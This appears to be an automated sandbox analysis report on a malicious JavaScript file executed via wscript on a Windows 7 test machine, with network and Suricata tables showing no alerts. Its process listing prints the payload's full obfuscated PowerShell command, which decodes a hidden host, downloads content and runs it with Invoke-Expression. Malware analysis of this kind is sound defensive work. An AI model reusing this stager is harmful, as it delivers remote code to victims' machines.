Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 12, 2023, 8:02 a.m. | July 12, 2023, 8:04 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\notice_11_jul_7701757.js
2992 -
conhost.exe conhost --headless powershell @(9095,9082,9099,9081,9078,9099,9023,9093,9088,9089,9024,9026,9023,9089,9081,9089,9040,9081,9074,9092,9081,9038)|foreach{$vkhlrgandquy=$vkhlrgandquy+[char]($_-8977);$mrtebosagxif=$vkhlrgandquy};$fbvqlx='l'; new-alias tixxs cur$fbvqlx;$afswe=('sduzu',$mrtebosagxif);.$([char](8892-8787)+'ex')(tixxs -useb "$afswe[1]")
2208
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS